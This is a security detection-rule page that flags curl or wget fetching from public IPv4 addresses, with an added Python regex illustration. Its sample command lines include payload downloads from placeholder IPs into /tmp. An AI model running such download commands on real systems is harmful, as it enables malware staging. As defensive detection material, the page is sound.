Linux CURL or WGET Direct to IPv4 Address

Anvilogic Forge

Summary
This detection rule identifies suspicious use of the CURL or WGET commands on Linux and macOS endpoints. It specifically looks for instances where these commands connect directly to an IPv4 address rather than to a domain name. The detection logic focuses on process events that match specific patterns: it applies multiple regular expressions to detect a CURL or WGET command in the process command line, combined with checks that the target IP address is not in a local or private address range, since connections to those ranges are more likely to be legitimate network activity. This rule was initially conceived in response to vulnerabilities exposed by CVE-2021-44228, which was linked to exploits that leverage command-line tools for initial access into systems. By monitoring process logs from the endpoint, security teams can gain visibility into unauthorized data exfiltration or malicious downloads that could compromise system integrity.
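The following is an added illustration of the logic described above, not Anvilogic's own rule code: it applies a regex for a curl/wget invocation and a regex for an IPv4 literal in the target, then drops addresses in local or private ranges. The process command lines, the regexes and the list of excluded ranges are all constructed assumptions for this example.

```python
import ipaddress
import re
from typing import List, Optional

# Constructed sample process command lines (not real endpoint telemetry).
SAMPLE_PROCESS_LINES = [
    "curl -s http://203.0.113.10/payload.sh -o /tmp/p.sh",
    "wget -q https://198.51.100.7:8443/x -O /tmp/x",
    "curl http://10.0.0.5/health",                      # private range: benign
    "wget http://127.0.0.1:9090/metrics",               # loopback: benign
    "curl -I https://example.com/",                     # hostname, not an IPv4 literal
    "/usr/bin/curl --insecure http://192.0.2.33/a.bin", # full path to the tool
    "curl 203.0.113.44/stage2",                         # IPv4 literal without a scheme
    "sh -c 'cd /tmp && wget http://172.16.4.9/tool'",   # private range inside sh -c
    "python3 -c 'print(1)'",                            # unrelated process
]

# Ranges treated as local/private and excluded from alerting (assumed list).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
)]

# curl or wget as a bare command token or as an absolute path such as /usr/bin/curl
TOOL_RE = re.compile(r"(?:^|\s)(?:/\S*/)?(?:curl|wget)(?=\s|$)")
# An IPv4 literal as the target host, with optional scheme, userinfo and port
IPV4_TARGET_RE = re.compile(
    r"(?:^|\s)(?:(?:https?|ftp)://(?:[^@\s/]+@)?)?"
    r"(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?=[/\s]|$)"
)


def extract_public_ipv4_target(cmdline: str) -> Optional[str]:
    """Return the non-local IPv4 address that curl/wget targets, or None.

    None means: not a curl/wget invocation, no IPv4 literal as target,
    or every IPv4 literal found falls inside LOCAL_NETS.
    """
    if not TOOL_RE.search(cmdline):
        return None
    for match in IPV4_TARGET_RE.finditer(cmdline):
        try:
            ip = ipaddress.IPv4Address(match.group(1))
        except ValueError:
            continue  # e.g. 999.1.2.3 fits the regex but is not a valid address
        if not any(ip in net for net in LOCAL_NETS):
            return str(ip)
    return None


def find_suspicious(lines: List[str]) -> List[str]:
    """Keep only the process lines that would alert under this rule."""
    return [line for line in lines if extract_public_ipv4_target(line) is not None]
```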
Categories
  • Linux
  • Endpoint
  • macOS
Data Sources
  • Process
  • Application Log
ATT&CK Techniques
  • T1190
Created: 2024-02-09